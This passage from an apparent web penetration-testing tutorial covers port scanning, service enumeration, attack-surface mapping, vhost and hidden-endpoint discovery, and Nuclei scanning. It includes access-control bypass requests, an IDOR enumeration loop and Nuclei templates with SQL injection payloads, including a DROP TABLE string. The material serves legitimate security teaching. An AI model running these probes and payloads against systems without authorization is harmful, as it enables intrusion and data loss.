# Scan all ports (very fast) masscan -p1-65535 target.com --rate=1000 -oL masscan_results.txt # Web ports only masscan -p80,443,8080,8443,8000,3000,5000,9090 target.com --rate=500 # Scan entire subnet masscan -p80,443 10.0.0.0/24 --rate=1000 -oJ masscan.json # Output formats masscan -p80,443 target.com --rate=1000 -oL list.txt # List masscan -p80,443 target.com --rate=1000 -oJ json.txt # JSON masscan -p80,443 target.com --rate=1000 -oX xml.txt # XML masscan -p80,443 target.com --rate=1000 -oG grep.txt # Grepable # Parse masscan results for nmap follow-up cat masscan_results.txt | grep "open" | awk '{print $4}' | sort -u > live_ips.txt cat masscan_results.txt | grep "open" | awk '{print $4":"$3}' | sed 's/\/tcp//' > ip_port_pairs.txt # Follow up with nmap for detailed service info nmap -iL live_ips.txt -p $(cat masscan_results.txt | grep "open" | awk '{print $3}' | sed 's/\/tcp//' | sort -u | tr '\n' ',') -sV -sC
4. Service Fingerprinting
# Banner grabbing nc -v target.com 80 <<< "HEAD / HTTP/1.0\r\n\r\n" nc -v target.com 22 nc -v target.com 21 # Nmap service probes nmap -sV --version-intensity 5 -p 80,443 target.com # Custom service identification curl -sI https://target.com | grep -iE "(Server|X-Powered|Via|X-Generator)" # WhatWeb for detailed fingerprinting whatweb -a 3 https://target.com # Identify web server behind CDN # Check origin IP: curl -sI https://target.com | grep -iE "(cf-ray|x-served-by|x-cache|x-amz|x-azure)" # Direct IP access (bypass CDN) curl -sI -H "Host: target.com" https://ORIGIN_IP # SSL certificate analysis openssl s_client -connect target.com:443 -servername target.com 2>/dev/null | \ openssl x509 -noout -subject -issuer -dates
5. Service-Specific Enumeration
# Elasticsearch (9200) curl -s http://target.com:9200/ curl -s http://target.com:9200/_cat/indices?v curl -s http://target.com:9200/_cluster/health curl -s http://target.com:9200/_search?q=* # Kibana (5601) curl -s http://target.com:5601/api/status # Redis (6379) redis-cli -h target.com INFO redis-cli -h target.com CONFIG GET * # MongoDB (27017) mongosh --host target.com --eval "db.adminCommand('listDatabases')" # Docker Registry (5000) curl -s http://target.com:5000/v2/_catalog curl -s http://target.com:5000/v2/IMAGE/tags/list # Jenkins (8080) curl -s http://target.com:8080/api/json curl -s http://target.com:8080/script # Groovy console # Grafana (3000) curl -s http://target.com:3000/api/health curl -s http://target.com:3000/api/datasources # Prometheus (9090) curl -s http://target.com:9090/api/v1/targets curl -s http://target.com:9090/api/v1/label/__name__/values # Consul (8500) curl -s http://target.com:8500/v1/catalog/services curl -s http://target.com:8500/v1/kv/?recurse # etcd (2379) curl -s http://target.com:2379/v2/keys/?recursive=true
6. HTTP/HTTPS Service Analysis
# httpx - HTTP toolkit echo target.com | httpx -ports 80,443,8080,8443,8000,3000,5000,9090 \ -status-code -title -tech-detect -web-server -content-length \ -follow-redirects -silent # Scan multiple hosts cat hosts.txt | httpx -ports 80,443,8080,8443 -status-code -title -silent -o httpx_results.txt # Detailed probe httpx -l hosts.txt -status-code -title -tech-detect -web-server \ -content-length -content-type -cdn -ip -cname -tls-grab \ -favicon -jarm -hash sha256 -o detailed_httpx.txt # Filter results cat httpx_results.txt | grep "200" > alive_200.txt cat httpx_results.txt | grep "401\|403" > auth_required.txt cat httpx_results.txt | grep -i "admin\|panel\|dashboard" > admin_panels.txt # JARM fingerprinting (TLS fingerprint) httpx -l hosts.txt -jarm -o jarm_results.txt # Compare JARM hashes to identify similar servers
7. SSL/TLS Analysis
# testssl.sh - comprehensive SSL/TLS test testssl.sh target.com testssl.sh --full target.com testssl.sh --vulnerable target.com testssl.sh -U target.com # vulnerabilities only # sslscan sslscan target.com # sslyze sslyze target.com sslyze --regular target.com # OpenSSL manual tests # Check TLS versions openssl s_client -connect target.com:443 -tls1 2>/dev/null && echo "TLS 1.0 supported" openssl s_client -connect target.com:443 -tls1_1 2>/dev/null && echo "TLS 1.1 supported" openssl s_client -connect target.com:443 -tls1_2 2>/dev/null && echo "TLS 1.2 supported" openssl s_client -connect target.com:443 -tls1_3 2>/dev/null && echo "TLS 1.3 supported" # Check for weak ciphers nmap -p 443 --script ssl-enum-ciphers target.com # Certificate details echo | openssl s_client -connect target.com:443 2>/dev/null | \ openssl x509 -noout -text | grep -A 2 "Subject\|Issuer\|Not After\|DNS:" # Check for Heartbleed nmap -p 443 --script ssl-heartbleed target.com # POODLE check nmap -p 443 --script ssl-poodle target.com
8. UDP Service Discovery
# UDP scan (slower than TCP) nmap -sU -p 53,161,500,4500,1900 target.com # Common UDP services on web infrastructure: # 53 - DNS # 161 - SNMP # 500 - IKE (VPN) # 4500 - IPsec NAT-T # 1900 - SSDP/UPnP # 123 - NTP # 514 - Syslog # 69 - TFTP # SNMP enumeration snmpwalk -v2c -c public target.com # NTP info ntpq -c readvar target.com
9. Network Mapping
# Traceroute to target traceroute target.com traceroute -T -p 443 target.com # TCP traceroute # Identify network boundaries # CDN → Load Balancer → Web Server → Application Server → Database # Detect load balancers # Multiple requests to see different server IDs for i in $(seq 1 10); do curl -sI https://target.com | grep -iE "(Server|X-Served|X-Backend|X-Cache)" done # lbd - load balancer detection lbd target.com # halberd halberd target.com # Detect reverse proxy # Signs: Via header, X-Forwarded-For processing, different error pages curl -sI https://target.com | grep -i "via"
Task 5
Application Mapping and Attack Surface
1. Application Architecture Mapping
Application Map: ├── Entry Points │ ├── Public pages (/, /about, /contact) │ ├── Authentication (login, register, forgot-password) │ ├── API endpoints (/api/v1/*) │ ├── File uploads (/upload, /import) │ └── WebSocket connections (ws://...) ├── User Roles │ ├── Anonymous │ ├── Authenticated User │ ├── Premium User │ ├── Moderator │ └── Administrator ├── Data Flows │ ├── User input → Processing → Storage → Output │ ├── Authentication flow │ ├── Payment flow │ └── File handling flow └── Trust Boundaries ├── Client ↔ Server ├── Web Server ↔ Application Server ├── Application ↔ Database └── Internal ↔ External services
2. Entry Point Identification
# Identify all entry points from crawl data # Forms curl -s https://target.com | grep -oP '<form[^>]*action="[^"]*"' | sort -u # Input fields curl -s https://target.com | grep -oP '<input[^>]*name="[^"]*"' | sort -u # URL parameters cat all_urls.txt | grep "?" | grep -oP '[?&]([^=]+)=' | sort | uniq -c | sort -rn # API endpoints cat all_urls.txt | grep -iE "/api/" | sort -u # File upload forms curl -s https://target.com | grep -iP 'type="file"|enctype="multipart' # JavaScript event handlers curl -s https://target.com | grep -oP 'on(click|submit|change|load|error)="[^"]*"' | sort -u # WebSocket endpoints curl -s https://target.com | grep -oiP '(wss?://[^\s"'"'"']+)' # Classify entry points by risk: # HIGH: File upload, payment processing, authentication, admin functions # MEDIUM: Search, user profile, comments, settings # LOW: Static pages, public content, help pages
3. Functionality Mapping
# Map each function of the application: # Authentication Functions [ ] Login (username/password) [ ] Login (social OAuth) [ ] Registration [ ] Password reset [ ] Email verification [ ] Two-factor authentication [ ] Session management [ ] Logout [ ] Remember me [ ] Account lockout # User Management [ ] Profile view/edit [ ] Avatar/photo upload [ ] Email change [ ] Password change [ ] Account deletion [ ] User search [ ] User listing # Content Functions [ ] Create content (posts, comments, reviews) [ ] Edit content [ ] Delete content [ ] Upload files [ ] Download files [ ] Search content [ ] Share content [ ] Export data # Administrative Functions [ ] User management [ ] Content moderation [ ] System configuration [ ] Log viewing [ ] Backup/restore [ ] API key management [ ] Role/permission management # API Functions [ ] CRUD operations [ ] Bulk operations [ ] Export/import [ ] Webhooks [ ] Rate-limited endpoints [ ] Public vs authenticated endpoints
4. Role-Based Access Mapping
# Test each functionality with different user roles # Create role matrix: # | Function | Anonymous | User | Premium | Admin | # |-------------------|-----------|------|---------|-------| # | View public | Y | Y | Y | Y | # | View profile | N | Own | Own | All | # | Edit profile | N | Own | Own | All | # | Delete user | N | N | N | Y | # | Admin panel | N | N | N | Y | # | API access | Limited | Y | Y | Y | # | File upload | N | Y | Y | Y | # | Export data | N | N | Y | Y | # Automated role comparison # Login as each role and crawl for role in anonymous user premium admin; do case $role in anonymous) katana -u https://target.com -d 5 -jc -silent > crawl_${role}.txt ;; user) katana -u https://target.com -H "Cookie: $USER_SESSION" -d 5 -jc -silent > crawl_${role}.txt ;; premium) katana -u https://target.com -H "Cookie: $PREMIUM_SESSION" -d 5 -jc -silent > crawl_${role}.txt ;; admin) katana -u https://target.com -H "Cookie: $ADMIN_SESSION" -d 5 -jc -silent > crawl_${role}.txt ;; esac done # Compare and find role-specific pages comm -23 <(sort crawl_admin.txt) <(sort crawl_user.txt) > admin_only.txt comm -23 <(sort crawl_user.txt) <(sort crawl_anonymous.txt) > auth_required.txt
5. Data Flow Analysis
# Track how data flows through the application # Input → Processing → Storage → Output # Each step is a potential vulnerability point: # Input stage: # - What data does the application accept? # - What format (text, JSON, XML, file)? # - Client-side validation (can be bypassed) # - Server-side validation (what's checked?) # Processing stage: # - How is input processed? # - Is it passed to interpreters (SQL, OS, template engine)? # - Is it serialized/deserialized? # - Is it used in file operations? # Storage stage: # - Where is data stored (database, file system, cache)? # - Is it encrypted? # - Is it sanitized before storage? # Output stage: # - Where is data displayed? # - Is output encoding applied? # - Is it reflected in HTTP headers? # - Is it included in emails/notifications? # Example data flow for a search function: # User input (search query) # → GET /search?q=<user_input> # → Server processes query # → Database query: SELECT * FROM items WHERE name LIKE '%<input>%' # → Results rendered in HTML: <h2>Results for: <input></h2> # # Vulnerabilities at each stage: # Input: No validation → accept malicious payloads # Processing: SQL concatenation → SQL injection # Output: No encoding → Reflected XSS
6. Third-Party Integration Mapping
# Identify third-party services and integrations # Payment processors curl -s https://target.com | grep -ioE "(stripe|paypal|braintree|square|adyen|klarna)" # Analytics curl -s https://target.com | grep -ioE "(google-analytics|gtag|ga\(|fbq\(|_paq|analytics)" # CDN/hosting curl -sI https://target.com | grep -iE "(cloudflare|akamai|cloudfront|fastly|incapsula)" # Authentication providers curl -s https://target.com | grep -ioE "(oauth|openid|saml|auth0|okta|firebase)" # Social media curl -s https://target.com | grep -ioE "(facebook|twitter|instagram|linkedin|github).com" # Chat/communication curl -s https://target.com | grep -ioE "(intercom|zendesk|freshdesk|drift|crisp|tawk)" # Email services curl -s https://target.com | grep -ioE "(mailgun|sendgrid|mailchimp|ses\.amazonaws)" # Storage curl -s https://target.com | grep -ioE "(s3\.amazonaws|storage\.googleapis|blob\.core\.windows)" # Each integration is a potential attack vector: # - OAuth misconfiguration → account takeover # - S3 bucket misconfiguration → data exposure # - Webhook endpoints → SSRF # - Third-party JS → supply chain attack
7. Error Handling Analysis
# Trigger different error conditions # 404 - Not Found curl -s https://target.com/nonexistent12345 # Look for: framework info, stack traces, debug info # 500 - Internal Server Error curl -s "https://target.com/page?id=1'" curl -s -X POST https://target.com/api/endpoint -d '{invalid json' # Look for: stack traces, database errors, internal paths # 400 - Bad Request curl -s -H "Content-Type: invalid" https://target.com # Look for: framework-specific error page # 405 - Method Not Allowed curl -s -X DELETE https://target.com/ # Look for: allowed methods # 413 - Request Entity Too Large python3 -c "print('A'*10000000)" | curl -s -X POST -d @- https://target.com # 414 - URI Too Long curl -s "https://target.com/$(python3 -c "print('A'*10000)")" # Test common error-triggering inputs PAYLOADS="' \" ; -- /* */ () [] {} <> \\ %00 %0a null undefined NaN Infinity" for payload in $PAYLOADS; do echo "[*] Testing: $payload" curl -s "https://target.com/search?q=$payload" -o /dev/null -w "%{http_code}\n" done
8. Security Headers Analysis
# Check security headers curl -sI https://target.com | grep -iE "^(strict-transport|content-security|x-frame|x-content|x-xss|referrer-policy|permissions-policy|cross-origin|feature-policy)" # Security headers checklist: # Strict-Transport-Security: max-age=31536000; includeSubDomains; preload # Content-Security-Policy: default-src 'self'; script-src 'self' # X-Frame-Options: DENY or SAMEORIGIN # X-Content-Type-Options: nosniff # X-XSS-Protection: 0 (or omitted - CSP preferred) # Referrer-Policy: strict-origin-when-cross-origin # Permissions-Policy: camera=(), microphone=(), geolocation=() # Cross-Origin-Opener-Policy: same-origin # Cross-Origin-Embedder-Policy: require-corp # Cross-Origin-Resource-Policy: same-origin # Automated header check python3 << 'PYEOF' import requests url = "https://target.com" r = requests.get(url, verify=False) headers = r.headers security_headers = { 'Strict-Transport-Security': 'max-age=', 'Content-Security-Policy': None, 'X-Frame-Options': None, 'X-Content-Type-Options': 'nosniff', 'Referrer-Policy': None, 'Permissions-Policy': None, } for header, expected in security_headers.items(): value = headers.get(header) if value: print(f"[+] {header}: {value}") else: print(f"[-] MISSING: {header}") PYEOF # securityheaders.com API curl -s "https://securityheaders.com/?q=target.com&followRedirects=on" | head -50
9. Attack Surface Summary Document
# Attack Surface Analysis: target.com ## Application Overview - Type: E-commerce web application - Stack: React frontend, Node.js/Express backend, PostgreSQL database - Hosting: AWS (us-east-1), CloudFront CDN - WAF: Cloudflare ## Authentication - Login: Email/password + Google OAuth - Session: JWT in httpOnly cookie - MFA: Optional TOTP - Password reset: Email-based token ## Entry Points (High Risk) 1. POST /api/auth/login - Authentication 2. POST /api/auth/register - Registration 3. POST /api/upload - File upload (images) 4. POST /api/checkout - Payment processing 5. GET /api/users/:id - User profile (IDOR potential) 6. PUT /api/users/:id - Profile update (mass assignment) 7. GET /search?q= - Search (XSS/SQLi potential) 8. POST /api/reviews - User-generated content (stored XSS) ## API Endpoints - REST API: /api/v1/* (authenticated) - GraphQL: /graphql (authenticated, introspection enabled) - WebSocket: wss://target.com/ws (notifications) ## User Roles 1. Anonymous - public pages only 2. User - CRUD own data, purchase 3. Seller - product management 4. Admin - full access, user management ## Third-Party Integrations - Stripe (payments) - AWS S3 (file storage) - SendGrid (email) - Google OAuth (authentication) - Cloudflare (CDN/WAF) ## Missing Security Headers - Content-Security-Policy - Permissions-Policy - Cross-Origin-Opener-Policy ## Known Technologies - Node.js 18.x, Express 4.18 - React 18.2, Next.js 14 - PostgreSQL 15 - Redis 7 (caching) - nginx 1.24 (reverse proxy)
10. Attack Surface Scoring
# Rate each entry point: # Risk = Likelihood × Impact # Likelihood factors: # - Publicly accessible? (Higher) # - Requires authentication? (Lower) # - Complex input handling? (Higher) # - Known vulnerability pattern? (Higher) # Impact factors: # - Data sensitivity (PII, financial, health) # - Business criticality # - Lateral movement potential # - Regulatory implications # Priority Matrix: # | Entry Point | Likelihood | Impact | Priority | # |----------------|-----------|--------|----------| # | File upload | High | Critical| P1 | # | Search (XSS) | High | Medium | P2 | # | API auth | Medium | Critical| P1 | # | User profile | Medium | High | P2 | # | Password reset | Medium | High | P2 | # | Comments | High | Medium | P2 | # | Static pages | Low | Low | P4 | # Test in order: P1 → P2 → P3 → P4
Task 6
Virtual Host and Hidden Endpoint Recon
1. Virtual Host (VHost) Concepts
Single IP can host multiple websites via virtual hosts: Request to 93.184.216.34 with Host: app1.target.com → App 1 content Request to 93.184.216.34 with Host: app2.target.com → App 2 content Request to 93.184.216.34 with Host: admin.target.com → Admin panel Request to 93.184.216.34 with Host: internal.target.com → Internal app VHosts not in DNS are invisible to standard subdomain enumeration. Only discoverable by fuzzing the Host header.
2. VHost Fuzzing Techniques
# ffuf vhost discovery ffuf -u http://TARGET_IP -H "Host: FUZZ.target.com" \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ -mc all -ac # With HTTPS ffuf -u https://TARGET_IP -H "Host: FUZZ.target.com" \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ -mc all -ac -k # Filter by size (exclude default response) DEFAULT_SIZE=$(curl -s -H "Host: nonexistent.target.com" http://TARGET_IP | wc -c) ffuf -u http://TARGET_IP -H "Host: FUZZ.target.com" \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ -fs $DEFAULT_SIZE # gobuster vhost mode gobuster vhost -u http://TARGET_IP \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ --append-domain -t 50 # Manual testing for sub in admin dev staging test internal api portal git jenkins jira wiki; do size=$(curl -s -H "Host: ${sub}.target.com" http://TARGET_IP | wc -c) code=$(curl -s -o /dev/null -w "%{http_code}" -H "Host: ${sub}.target.com" http://TARGET_IP) echo "$code ${size}bytes ${sub}.target.com" done
3. Hidden Directory Discovery
# Common hidden/sensitive directories HIDDEN_DIRS=".git .svn .hg .bzr _darcs .well-known .well-known/security.txt .well-known/openid-configuration server-status server-info __debug__ _debug debug _debugbar _profiler _wdt (Symfony profiler) console __console (Flask/Werkzeug) elmah.axd trace.axd (ASP.NET) actuator actuator/health actuator/env actuator/mappings (Spring Boot) rails/info rails/info/routes (Rails) wp-json wp-json/wp/v2 (WordPress API) cgi-bin fcgi-bin tmp temp cache backup backups old archive legacy test tests testing dev development stage staging private internal restricted api/internal api/debug api/admin graphql graphiql phpmyadmin pma phpMyAdmin adminer" for dir in $HIDDEN_DIRS; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/$dir" 2>/dev/null) if [ "$code" != "404" ] && [ "$code" != "000" ]; then echo "[+] /$dir → $code" fi done # Technology-specific paths # IIS: /iishelp, /iisadmin, /_vti_bin, /_vti_inf.html # Apache: /server-status, /server-info, /.htaccess # Nginx: /nginx_status, /nginx.conf # Tomcat: /manager/html, /host-manager/html, /status # JBoss: /jmx-console, /web-console, /invoker/JMXInvokerServlet # WebLogic: /console, /wls-wsat, /bea_wls_internal
4. Path Normalization Bypass
# WAF/auth bypass via path normalization URL="https://target.com/admin" # Double URL encoding curl -s "https://target.com/%61%64%6d%69%6e" curl -s "https://target.com/%2561%2564%256d%2569%256e" # Path traversal normalization curl -s "https://target.com/./admin" curl -s "https://target.com//admin" curl -s "https://target.com/admin/" curl -s "https://target.com/admin/." curl -s "https://target.com/;/admin" curl -s "https://target.com/.;/admin" curl -s "https://target.com/admin;/" curl -s "https://target.com/ADMIN" curl -s "https://target.com/Admin" curl -s "https://target.com/admin..;/" # Using X-Original-URL / X-Rewrite-URL headers (Nginx/IIS) curl -s -H "X-Original-URL: /admin" https://target.com/ curl -s -H "X-Rewrite-URL: /admin" https://target.com/ # Using X-Forwarded-Prefix curl -s -H "X-Forwarded-Prefix: /admin" https://target.com/ # Nginx off-by-slash curl -s "https://target.com/assets../admin" # Method override curl -s -X POST -H "X-HTTP-Method-Override: GET" https://target.com/admin
5. HTTP Method Discovery
# Test all HTTP methods on endpoints ENDPOINT="https://target.com/api/users" for method in GET POST PUT DELETE PATCH HEAD OPTIONS TRACE CONNECT; do code=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$ENDPOINT" 2>/dev/null) echo "$method → $code" done # OPTIONS request reveals allowed methods curl -s -X OPTIONS -I "$ENDPOINT" | grep -i "allow" # TRACE method (potential XST - Cross-Site Tracing) curl -s -X TRACE "$ENDPOINT" # Method override headers curl -s -X POST -H "X-HTTP-Method-Override: PUT" "$ENDPOINT" -d '{"test":1}' curl -s -X POST -H "X-Method-Override: DELETE" "$ENDPOINT" curl -s -X POST -H "X-HTTP-Method: PATCH" "$ENDPOINT" -d '{"test":1}' # Nmap HTTP methods nmap --script http-methods -p 80,443 target.com
6. Forced Browsing / Direct Object Access
# Access resources directly without following links # Common admin paths ADMIN_PATHS="/admin /administrator /admin/login /admin/dashboard /manage /management /manager /portal /dashboard /control-panel /cpanel /admin.php /admin.html /admin.asp /admin.jsp /wp-admin /wp-login.php /user/login /auth/login /backoffice /backend /sysadmin /superadmin" for path in $ADMIN_PATHS; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path" 2>/dev/null) if [ "$code" != "404" ]; then echo "[+] $path → $code" fi done # Predictable resource locations # /user/1, /user/2, /user/3 (IDOR enumeration) for id in $(seq 1 100); do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/api/users/$id" 2>/dev/null) if [ "$code" = "200" ]; then echo "[+] /api/users/$id → 200" fi done # File enumeration # /uploads/1.jpg, /uploads/2.jpg # /documents/report_001.pdf, /documents/report_002.pdf # /backups/backup_20240101.zip
7. API Versioning Discovery
# Discover API versions for ver in v0 v1 v2 v3 v4 v5 beta alpha internal dev latest; do for base in /api /rest /service /services; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com${base}/${ver}/" 2>/dev/null) if [ "$code" != "404" ] && [ "$code" != "000" ]; then echo "[+] ${base}/${ver}/ → $code" fi done done # Header-based versioning for ver in 1 2 3 2024-01-01 2023-01-01; do for header in "Api-Version" "X-API-Version" "Accept-Version" "X-Api-Version"; do code=$(curl -s -o /dev/null -w "%{http_code}" \ -H "$header: $ver" "https://target.com/api/users" 2>/dev/null) echo "$header: $ver → $code" done done # Accept header versioning curl -s -H "Accept: application/vnd.api.v1+json" https://target.com/api/users curl -s -H "Accept: application/vnd.api.v2+json" https://target.com/api/users # Old API versions often lack security controls added in newer versions
8. WebSocket Endpoint Discovery
# Common WebSocket paths WS_PATHS="/ws /websocket /socket /socket.io /sockjs /ws/v1 /ws/v2 /realtime /live /stream /notifications /chat /feed /events" for path in $WS_PATHS; do # HTTP upgrade test code=$(curl -s -o /dev/null -w "%{http_code}" \ -H "Upgrade: websocket" \ -H "Connection: Upgrade" \ -H "Sec-WebSocket-Version: 13" \ -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \ "https://target.com$path" 2>/dev/null) if [ "$code" = "101" ] || [ "$code" = "200" ]; then echo "[+] WebSocket endpoint: $path (HTTP $code)" fi done # Socket.IO detection curl -s "https://target.com/socket.io/?EIO=4&transport=polling" # WebSocket testing with websocat websocat ws://target.com/ws # or websocat wss://target.com/ws # wscat wscat -c ws://target.com/ws
9. Configuration and Debug Endpoint Discovery
# Framework debug endpoints DEBUG_PATHS=" /debug /debug/default/view /debug/vars /debug/pprof /_debug /__debug__ /debugbar /console /__console /werkzeug /werkzeug/console /_profiler /profiler /_wdt /actuator /actuator/env /actuator/configprops /actuator/mappings /actuator/beans /actuator/health /actuator/info /actuator/metrics /actuator/threaddump /actuator/heapdump /actuator/loggers /actuator/auditevents /actuator/httptrace /actuator/scheduledtasks /rails/info /rails/info/properties /rails/info/routes /graphiql /playground /altair /swagger /swagger-ui /api-docs /openapi.json /info /health /status /version /env /metrics /phpinfo.php /info.php /test.php /pi.php /server-status /server-info /nginx_status /trace /config /settings /setup /adminer /phpmyadmin /pma /elmah.axd /trace.axd /__clockwork /telescope (Laravel) " for path in $DEBUG_PATHS; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path" 2>/dev/null) if [ "$code" = "200" ] || [ "$code" = "302" ]; then echo "[+] $path → $code" fi done
Task 7
Vulnerability Scanning with Nuclei
1. Nuclei Fundamentals
# Installation go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest # Update templates nuclei -update-templates # Template directory ls ~/.local/nuclei-templates/ # Categories: cves, exposures, misconfiguration, technologies, # takeovers, vulnerabilities, default-logins, etc. # Basic scan nuclei -u https://target.com # Scan with all templates nuclei -u https://target.com -t nuclei-templates/ # Scan multiple targets nuclei -l targets.txt -o results.txt
2. Template Categories and Usage
# CVE detection nuclei -u https://target.com -t cves/ nuclei -u https://target.com -t cves/2024/ -t cves/2023/ # Technology detection nuclei -u https://target.com -t technologies/ # Misconfiguration nuclei -u https://target.com -t misconfiguration/ # Exposure (sensitive files, tokens) nuclei -u https://target.com -t exposures/ # Default logins nuclei -u https://target.com -t default-logins/ # Takeover detection nuclei -l subdomains.txt -t takeovers/ # Specific vulnerability types nuclei -u https://target.com -t vulnerabilities/ nuclei -u https://target.com -t vulnerabilities/xss/ nuclei -u https://target.com -t vulnerabilities/sqli/ nuclei -u https://target.com -t vulnerabilities/ssrf/ nuclei -u https://target.com -t vulnerabilities/lfi/ nuclei -u https://target.com -t vulnerabilities/rce/ # Fuzzing templates nuclei -u https://target.com -t fuzzing/ # Headless templates (browser-based) nuclei -u https://target.com -t headless/ -headless # Filter by severity nuclei -u https://target.com -severity critical,high nuclei -u https://target.com -severity critical,high,medium -t cves/ # Filter by tags nuclei -u https://target.com -tags sqli,xss,rce,lfi nuclei -u https://target.com -tags wordpress nuclei -u https://target.com -tags apache,nginx nuclei -u https://target.com -tags cve2024 # Exclude templates nuclei -u https://target.com -exclude-tags dos,fuzz nuclei -u https://target.com -exclude-templates cves/2019/
3. Advanced Scanning Options
# Rate limiting nuclei -l targets.txt -rate-limit 100 # requests per second nuclei -l targets.txt -bulk-size 25 # parallel hosts nuclei -l targets.txt -concurrency 10 # template concurrency # Proxy through Burp nuclei -u https://target.com -proxy http://127.0.0.1:8080 # Custom headers nuclei -u https://target.com -H "Authorization: Bearer TOKEN" nuclei -u https://target.com -H "Cookie: session=abc123" # Follow redirects nuclei -u https://target.com -follow-redirects # Timeout settings nuclei -u https://target.com -timeout 10 # seconds # Retries nuclei -u https://target.com -retries 3 # Output formats nuclei -u https://target.com -o results.txt # text nuclei -u https://target.com -json -o results.json # JSON nuclei -u https://target.com -me output_dir/ # markdown nuclei -u https://target.com -se output_dir/ # SARIF nuclei -u https://target.com -irr # include request/response # Automatic scan nuclei -u https://target.com -as # automatic template selection based on tech # Silent mode nuclei -u https://target.com -silent # Verbose/debug nuclei -u https://target.com -v # verbose nuclei -u https://target.com -debug # debug
4. Writing Custom Nuclei Templates
# Basic GET request template id: custom-admin-panel info: name: Admin Panel Detection author: pentester severity: info description: Detects admin panel tags: admin,panel http: - method: GET path: - "{{BaseURL}}/admin" - "{{BaseURL}}/administrator" - "{{BaseURL}}/admin/login" matchers-condition: or matchers: - type: word words: - "admin" - "login" - "dashboard" condition: or - type: status status: - 200 - 302
# POST request template id: custom-sqli-check info: name: SQL Injection Detection author: pentester severity: high tags: sqli http: - method: POST path: - "{{BaseURL}}/login" body: "username=admin'&password=test" headers: Content-Type: application/x-www-form-urlencoded matchers-condition: or matchers: - type: word words: - "SQL syntax" - "mysql_fetch" - "ORA-" - "PostgreSQL" - "Microsoft SQL" condition: or
# Multiple requests with extractors id: custom-api-enum info: name: API Version Enumeration author: pentester severity: info tags: api http: - method: GET path: - "{{BaseURL}}/api/v1/" - "{{BaseURL}}/api/v2/" - "{{BaseURL}}/api/v3/" matchers: - type: status status: - 200 - 301 extractors: - type: regex regex: - '"version":\s*"([^"]+)"'
# Template with conditions id: custom-spring-actuator info: name: Spring Boot Actuator Exposure author: pentester severity: high tags: spring,misconfig http: - method: GET path: - "{{BaseURL}}/actuator" - "{{BaseURL}}/actuator/env" - "{{BaseURL}}/actuator/configprops" - "{{BaseURL}}/actuator/heapdump" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "spring" - "actuator" - "beans" condition: or
5. Nuclei Workflows
# workflow.yaml - chain templates together id: web-recon-workflow info: name: Web Reconnaissance Workflow author: pentester workflows: - template: technologies/tech-detect.yaml subtemplates: - tags: wordpress templates: - cves/wordpress/ - vulnerabilities/wordpress/ - tags: apache templates: - cves/apache/ - misconfiguration/apache/ - tags: nginx templates: - cves/nginx/ - misconfiguration/nginx/ - tags: php templates: - cves/php/ - vulnerabilities/php/
# Run workflow nuclei -u https://target.com -w workflow.yaml # Built-in workflows nuclei -u https://target.com -w workflows/
6. Nuclei with Other Tools
# Pipeline: subfinder → httpx → nuclei subfinder -d target.com -silent | httpx -silent | nuclei -t cves/ -o results.txt # Pipeline: naabu (port scan) → httpx → nuclei naabu -host target.com -p 80,443,8080,8443 -silent | httpx -silent | nuclei -severity critical,high # From Burp Suite export # Export URLs from Burp → use as nuclei input nuclei -l burp_urls.txt -t vulnerabilities/ # With notify (send results to messaging) nuclei -l targets.txt -t cves/ -severity critical | notify -provider slack # Scheduled scanning # crontab entry # 0 0 * * * nuclei -l targets.txt -t cves/ -severity critical -o /tmp/nuclei_$(date +\%Y\%m\%d).txt
7. Nuclei for Specific Vulnerability Classes
# XSS detection nuclei -u "https://target.com/search?q=test" -t fuzzing/xss/ # SQL Injection nuclei -u "https://target.com/page?id=1" -t fuzzing/sqli/ # SSRF nuclei -u https://target.com -t vulnerabilities/ssrf/ # Open redirect nuclei -u https://target.com -t vulnerabilities/redirect/ # CORS misconfiguration nuclei -u https://target.com -t misconfiguration/cors/ # Exposed panels nuclei -u https://target.com -t exposed-panels/ # Default credentials nuclei -u https://target.com -t default-logins/ # Token/secret exposure nuclei -u https://target.com -t exposures/tokens/ nuclei -u https://target.com -t exposures/configs/ # File exposure nuclei -u https://target.com -t exposures/files/ nuclei -u https://target.com -t exposures/backups/
8. Custom Fuzzing with Nuclei
# Parameter fuzzing template id: param-sqli-fuzz info: name: Parameter SQL Injection Fuzzer author: pentester severity: high tags: sqli,fuzz http: - method: GET path: - "{{BaseURL}}?id={{url_encode(sqli_payload)}}" payloads: sqli_payload: - "1'" - "1 OR 1=1" - "1' OR '1'='1" - "1; DROP TABLE--" - "1 UNION SELECT NULL--" - "1' AND SLEEP(5)--" matchers-condition: or matchers: - type: word words: - "SQL syntax" - "mysql" - "ORA-" - "unclosed quotation" condition: or - type: dsl dsl: - 'duration>=5'
9. Results Analysis and Reporting
# Parse nuclei JSON output cat nuclei_results.json | jq -r '.info.severity' | sort | uniq -c | sort -rn cat nuclei_results.json | jq -r '.["template-id"]' | sort | uniq -c | sort -rn cat nuclei_results.json | jq -r 'select(.info.severity == "critical") | .host' # Generate summary report nuclei -l targets.txt -t cves/ -severity critical,high -me report_dir/ # Creates markdown report in report_dir/ # Export for further analysis nuclei -l targets.txt -json -o results.json -irr # -irr includes full request/response for evidence # Deduplicate results cat nuclei_results.json | jq -s 'unique_by(.["template-id"] + .host)' > deduped.json
10. Nuclei Scanning Strategy
